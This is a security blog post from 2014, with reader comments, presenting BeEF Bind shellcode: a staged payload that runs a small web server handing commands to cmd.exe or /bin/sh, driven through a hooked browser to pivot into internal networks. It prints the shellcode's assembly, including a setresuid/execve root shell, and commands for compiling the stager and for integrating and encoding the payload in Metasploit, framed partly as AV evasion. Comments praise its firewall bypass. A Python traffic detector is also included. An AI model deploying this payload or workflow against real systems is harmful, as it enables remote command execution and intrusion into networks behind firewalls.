Wednesday, March 19, 2014

Exploiting with BeEF Bind shellcode

Today's post contributed by Bart Leppens.

Some time ago Michele blogged about the BeEF Bind shellcode that Ty Miller wrote for the BeEF project. In the meantime we have committed the full source of this shellcode to the BeEF repository, and it has been ported to Linux x86 and x64 as well. So, next time you find an exploitable overflow in an application, why not give BeEF Bind a try?
In contrast to the "classical" bind or reverse shell shellcodes, BeEF Bind makes use of Inter-Protocol Communication. This lets it be used in a very subtle way to pivot into a company's internal network by abusing a victim's hooked browser. To achieve this, our shellcode is in fact a small web server that proxies commands and their output back and forth between cmd.exe and the victim's browser. To make it more effective, the CORS header "Access-Control-Allow-Origin: *" has been added to its responses. This means that when we make cross-domain AJAX calls towards it, we are able to read the response of the HTTP request without violating the Same Origin Policy.

Exploit flow

The BeEF Bind shellcode consists of two parts: the Stager and the Stage. The Stager is a smaller piece of shellcode that allocates one page of executable memory and opens a socket that waits for a client connection before receiving the actual payload: the Stage.

Once the client sends data, the shellcode scans the received request. The Stager locates the Stage by searching memory for the string cmd=, checking whether the EBX register value points to it:

cmp dword [esi], 0x3d646d63  ;=dmc, i.e. "cmd=" read as a little-endian dword

The string indicates the start of the bytecode of the actual Stage.  The Stager copies this bytecode to the allocated executable memory and then jumps into it.

The Stage initializes a server socket as well.

Sets of OS pipes are created to redirect input and output through cmd.exe (Windows) or /bin/sh (Linux). These pipes are used to pass in OS commands, which are then executed, and to collect their output.

On Windows, the CreateProcess API is called to execute the command. On Linux this is done with the setresuid and execve syscalls:

;setresuid16(0, 0, 0): reset real, effective and saved uid (regains root on a setuid target)
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
mov al, 0xa4 ;sys_setresuid16
int 0x80
;execve("/bin//sh", 0, 0): ecx and edx are still zero, so argv and envp are NULL
xor eax, eax
push eax ;NUL terminator of the path string
push eax
push 0x68732f2f ;//sh
push 0x6e69622f ;/bin
mov ebx, esp ;ebx -> "/bin//sh"
push BYTE 0x0b ;sys_execve
pop eax
int 0x80

So, when the client sends a request to the server socket, the shellcode once again scans for the string cmd=. Everything after this string is passed to cmd.exe until a CR/LF is reached. Then the output of the executed command is sent back to the client.
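To make the exchange above concrete from the detection side, here is an added Python example (not code from this post or from the BeEF project) that scans a buffer for the cmd= marker dword the way the Stager does, extracts the CR/LF-terminated command the way the Stage does, and flags a request/response pair that combines such a command with the wildcard CORS header. The sample HTTP messages, host and port are constructed.

```python
"""Added example, not BeEF project code: a small detector for BeEF Bind
style HTTP traffic, built only from the protocol details in the post
(the 0x3d646d63 marker dword, the CR/LF delimiter and the CORS header).
All sample messages below are constructed."""
import struct

# The stager compares a dword against 0x3d646d63; on little-endian x86
# those four bytes are b"cmd=" (which reads "=dmc" as a big-endian hex dump).
CMD_MARKER_DWORD = 0x3D646D63
CMD_MARKER = struct.pack("<I", CMD_MARKER_DWORD)  # b"cmd="
CORS_ANY = b"Access-Control-Allow-Origin: *"


def find_marker(buf: bytes) -> int:
    """Scan a buffer the way the stager does: compare every 4-byte
    window with the marker dword. Returns the offset, or -1 if absent."""
    for off in range(len(buf) - 3):
        if struct.unpack_from("<I", buf, off)[0] == CMD_MARKER_DWORD:
            return off
    return -1


def extract_command(buf: bytes):
    """Mirror the stage's parsing: everything after 'cmd=' up to the
    first CR/LF is what gets handed to cmd.exe or /bin/sh."""
    off = find_marker(buf)
    if off < 0:
        return None
    body = buf[off + len(CMD_MARKER):]
    end = body.find(b"\r\n")
    return body if end < 0 else body[:end]


def split_http(msg: bytes):
    """Split a raw HTTP message into (headers, body) at the blank line."""
    head, _, body = msg.partition(b"\r\n\r\n")
    return head, body


def classify(request: bytes, response: bytes) -> dict:
    """Flag an exchange as BeEF-Bind-like when the request body carries a
    'cmd=' command and the response answers with a wildcard CORS header,
    a combination a legitimate intranet service rarely exposes."""
    _, req_body = split_http(request)
    resp_head, _ = split_http(response)
    command = extract_command(req_body)
    wildcard_cors = CORS_ANY.lower() in resp_head.lower()
    return {
        "command": command,
        "wildcard_cors": wildcard_cors,
        "suspicious": command is not None and wildcard_cors,
    }


# Constructed sample exchange modelled on the flow described in the post.
SAMPLE_REQUEST = (b"POST / HTTP/1.1\r\nHost: 10.0.0.5:4444\r\n"
                  b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                  b"cmd=ipconfig /all\r\n")
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\nAccess-Control-Allow-Origin: *\r\n"
                   b"Content-Type: text/html\r\n\r\nWindows IP Configuration\r\n")
BENIGN_REQUEST = b"GET /index.html HTTP/1.1\r\nHost: intranet\r\n\r\n"

if __name__ == "__main__":
    print(classify(SAMPLE_REQUEST, SAMPLE_RESPONSE))
    print(classify(BENIGN_REQUEST, SAMPLE_RESPONSE))
```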

BeEF bind established
In our BeEF codebase, the shellcode is located in the folder modules/exploits/beefbind/shellcode_sources.

Both the linux and windows directories contain commented assembly code for the shellcode as well as a small C file, "socket.c". From these small files a standalone version (for testing or RCE) can be compiled with MinGW (Windows) or with GCC (Linux):

c:\MinGW\bin>gcc -o beefstager.exe beefstager.c

and then executed with:

c:\MinGW\bin>beefstager.exe 1234

or just with the default port 4444:

c:\MinGW\bin>beefstager.exe

The msf directory contains the modules and the instructions (instructions.txt) on how to use BeEF Bind with the Metasploit framework. This comes in handy for re-encoding the shellcode for AV evasion or simply for encoding out bad characters such as the NULL byte.

copy beef_bind-handler.rb %METASPLOIT_PATH%/lib/msf/core/handler/beef_bind.rb
copy beef_bind-stage-windows-x86.rb %METASPLOIT_PATH%/modules/payloads/stages/windows/beef_shell.rb
copy beef_bind-stager-windows-x86.rb %METASPLOIT_PATH%/modules/payloads/stagers/windows/beef_bind.rb
copy beef_bind-stage-linux-x86.rb %METASPLOIT_PATH%/modules/payloads/stages/linux/x86/beef_shell.rb
copy beef_bind-stager-linux-x86.rb %METASPLOIT_PATH%/modules/payloads/stagers/linux/x86/beef_bind.rb
copy beef_bind-stage-linux-x64.rb %METASPLOIT_PATH%/modules/payloads/stages/linux/x64/beef_shell.rb
copy beef_bind-stager-linux-x64.rb %METASPLOIT_PATH%/modules/payloads/stagers/linux/x64/beef_bind.rb

Check it works:
msfpayload -l | grep beef_bind

Get info on the payload:
msfpayload windows/beef_shell/beef_bind S

Dump stager and stage in C format:
msfpayload windows/beef_shell/beef_bind C

Dump stager in raw format:
msfpayload windows/beef_shell/beef_bind R > beef_bind-stager

Encode stager to remove nulls:
msfpayload windows/beef_shell/beef_bind R | msfencode -b '\x00'

If you are interested in more information about attacking internal networks via the browser or about BeEF internals, Chapter 10 of "The Browser Hacker's Handbook", "Attacking Networks", covers more of this kind of topic.

If you know of other good resources for browser hacking, or other BeEFy stuff, we would love to hear about them!

Bart Leppens has a master's degree in Informatics. He has over 10 years of experience in IT, mainly in software development, and has reported security bugs in widely used products from major vendors. At the moment he is working as a Project Manager for the Belgian government at the Department of Finances. In his spare time he likes to contribute to the BeEF project. You can reach him via Twitter: @bmantra


  1. Very nice! This looks like a great step forward. Do you guys plan to have a reverse shell proxy back through the hooked machine as well? You guys know more about this than I do, but it would appear that reverse shells are favoured over bind shells thanks to firewalls and the like. I'd love to see an implementation of this which connects back.

    Another admittedly picky note, encoding payloads is only about bad char avoidance, and not about AV evasion at all. If anything, encoding makes the payload look _more_ suspicious :) Dave Maloney presented a great talk at DerbyCon last year that talks about this, it can be found here:

    Keep up the great work! Cheers :)

    1. Hey OJ.

      That is exactly what BeEF Bind does. The browser delivers the exploit. The shellcode then sets up a mini-web server to accept OS commands from the hooked web browser. The output is then tunnelled back through the browser to the attacker on the Internet, which basically bypasses any border security controls to allow remote access to internal systems and shells.


  2. Happy you like it OJ!

    This can be even better than a traditional bind shell and even more likely than a reverse shell to provide you access out of the network. Also, you don’t even have to compromise the machine the browser is running on. Remember the browser already has a connection to a server you control and it can connect to the target. Once the target has been compromised (via Inter-protocol Exploitation) and the BeEF Bind is running, BeEF will simply use the browser to proxy communication between you and the target over HTTP/S.

    Why is this better than a traditional bind shell and reverse shell? Obviously, a bind shell needs the firewall rules to allow an incoming connection to your target. A reverse shell also needs supportive egress firewall rules. It needs to allow connections from the target to the server you control on the Internet. However, the BeEF Bind needs neither. It needs a browser to do what browsers do – send HTTP requests.

    FYI Aviator prevents this out of the box.

  25. How do I use the BeEF framework to hack a browser across the network? I found an article on the internet, but it is about infecting a browser inside the network.
  27. How do I execute a PowerShell script with BeEF in a hooked browser? Any idea?